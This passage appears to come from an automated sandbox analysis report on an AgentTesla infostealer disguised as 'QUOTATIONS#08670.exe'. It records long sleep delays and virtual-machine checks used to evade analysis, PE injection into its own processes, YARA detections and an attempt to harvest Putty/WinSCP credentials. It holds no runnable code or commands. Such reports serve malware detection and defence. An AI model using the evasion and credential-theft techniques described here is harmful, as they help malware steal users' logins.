                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeWindow / User API: threadDelayed 6895Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWindow / User API: threadDelayed 4160Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWindow / User API: threadDelayed 5683Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWindow / User API: threadDelayed 4145Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWindow / User API: threadDelayed 5711Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 7796Thread sleep time: -28592453314249787s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 7796Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep count: 37 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -34126476536362649s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5300Thread sleep count: 2951 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -599874s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5300Thread sleep count: 6895 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -599763s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -599656s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -599547s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -599437s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -599328s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -599219s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -599109s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -599000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -598891s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -598766s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -598641s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -598519s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -598318s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -598188s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -598063s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -597938s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -597828s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -597719s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -597594s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -597484s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -597375s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -597263s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -597156s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -597047s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -596938s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -596813s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -596700s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -596594s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -596469s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -596359s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -596250s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -596140s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -596031s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -595922s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -595811s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -595662s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -595428s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -595297s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -595187s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -595078s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -594969s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -594844s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -594734s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -594625s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -594516s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -594406s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -594297s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe TID: 5160Thread sleep time: -594187s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 1724Thread sleep time: -33204139332677172s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 1724Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7636Thread sleep count: 40 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7636Thread sleep time: -36893488147419080s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7636Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep count: 4145 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep count: 5711 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 30000Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 599874Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 599763Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 599547Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 599437Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 599328Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 599219Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 599109Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 599000Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 598891Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 598766Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 598641Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 598519Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 598318Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 598188Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 598063Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 597938Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 597828Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 597719Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 597594Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 597484Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 597375Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 597263Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 597156Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 597047Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 596938Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 596813Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 596700Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 596594Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 596469Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 596359Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 596250Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 596140Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 596031Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 595922Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 595811Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 595662Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 595428Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 595297Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 595187Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 595078Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 594969Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 594844Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 594734Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 594625Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 594516Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 594406Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 594297Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 594187Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 30000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 30000Jump to behavior
                  Source: QUOTATIONS#08670.exe, newapp.exe.4.drBinary or memory string: d6nu^YDY7bKtlFzp?nrett^pnreKtaPet^Dtrohl_teSQretnI?nottu}nosiMapmoCXnirtS?noitpZcxEytVruceSZkaMnPitpecGEtratldaerhknoitOecxEnPitareOOdilaInInoVtpecxzlluNtQemugr~noitOecxEeXnaRfOKuOxedQInoiKpecxE[ohteM[ilavnvnoitOecxEdZtroppJStoNQoitpe\xEdesPpsiDt\ejbOQoitpe\xEdepOarWemVtnuRQoitpe\xEbdP?noitiKepeReXasseMZkaFnPitisootratSRroFnPitisootratS`tesnPitidnPC_noVtcellPCwoRwZiVdirxataDQoitceSloCnmJloCweVVdirG^taDnPitcelSoClorKnoCnPitcelSoClle|weiVdVrGata{noit\elfeR
                  Source: QUOTATIONS#08670.exe, 00000000.00000002.2019882237.0000000004E50000.00000004.08000000.00040000.00000000.sdmp, QUOTATIONS#08670.exe, 00000000.00000002.2017156067.00000000038DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VBoxTray
                  Source: QUOTATIONS#08670.exe, newapp.exe.4.drBinary or memory string: noVtpecxzlluNtQemugr~
                  Source: QUOTATIONS#08670.exe, 00000004.00000002.2571627082.00000000012B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: QUOTATIONS#08670.exe, 00000000.00000002.2017156067.00000000038DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 2051979379GSOFTWARE\VMware, Inc.\VMware VGAuth
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeMemory written: C:\Users\user\Desktop\QUOTATIONS#08670.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory written: C:\Users\user\AppData\Roaming\newapp\newapp.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory written: C:\Users\user\AppData\Roaming\newapp\newapp.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess created: C:\Users\user\Desktop\QUOTATIONS#08670.exe "C:\Users\user\Desktop\QUOTATIONS#08670.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"Jump to behavior
                  Source: QUOTATIONS#08670.exe, 00000004.00000002.2575902767.000000000314E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: QUOTATIONS#08670.exe, 00000004.00000002.2575902767.000000000314E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $_q8<b>[ Program Manager]</b> (03/10/2024 19:44:51)<br>{Win}THdq|
                  Source: QUOTATIONS#08670.exe, 00000004.00000002.2575902767.000000000314E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $_q3<b>[ Program Manager]</b> (03/10/2024 19:44:51)<br>
                  Source: QUOTATIONS#08670.exe, 00000004.00000002.2575902767.000000000314E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q
                  Source: QUOTATIONS#08670.exe, 00000004.00000002.2575902767.000000000314E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $_q9<b>[ Program Manager]</b> (03/10/2024 19:44:51)<br>{Win}rTHdq|
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeQueries volume information: C:\Users\user\Desktop\QUOTATIONS#08670.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeQueries volume information: C:\Users\user\Desktop\QUOTATIONS#08670.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Users\user\AppData\Roaming\newapp\newapp.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Users\user\AppData\Roaming\newapp\newapp.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected AgentTesla
                  Source: Yara matchFile source: 9.2.newapp.exe.3cc54ba.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.newapp.exe.4345322.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.newapp.exe.43823e0.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.newapp.exe.3d02578.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.newapp.exe.428e0d2.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATIONS#08670.exe.3828c62.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATIONS#08670.exe.391cf70.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.newapp.exe.4250ff2.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.newapp.exe.3c4b33a.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.newapp.exe.3c0e26a.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.newapp.exe.3c4b33a.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.QUOTATIONS#08670.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.newapp.exe.3bd118a.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.newapp.exe.3d02578.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATIONS#08670.exe.37ebb82.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATIONS#08670.exe.37ebb82.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.newapp.exe.3c0e26a.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATIONS#08670.exe.3865d32.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.newapp.exe.42cb1a2.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATIONS#08670.exe.3828c62.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATIONS#08670.exe.3865d32.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.newapp.exe.428e0d2.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.newapp.exe.3cc54ba.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATIONS#08670.exe.38dfeb2.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.newapp.exe.43823e0.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.newapp.exe.42cb1a2.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.newapp.exe.4345322.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.newapp.exe.3bd118a.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.newapp.exe.4250ff2.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATIONS#08670.exe.391cf70.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATIONS#08670.exe.38dfeb2.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.2575902767.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2017156067.00000000036DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.2596669969.0000000003AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2575902767.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2597502551.0000000004213000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.2596669969.0000000003CC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2570779363.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2597502551.0000000004345000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2017156067.00000000038DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2597502551.000000000413F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2017156067.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.2596669969.0000000003B94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: QUOTATIONS#08670.exe PID: 7592, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: QUOTATIONS#08670.exe PID: 8124, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: newapp.exe PID: 6576, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: newapp.exe PID: 3820, type: MEMORYSTR
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
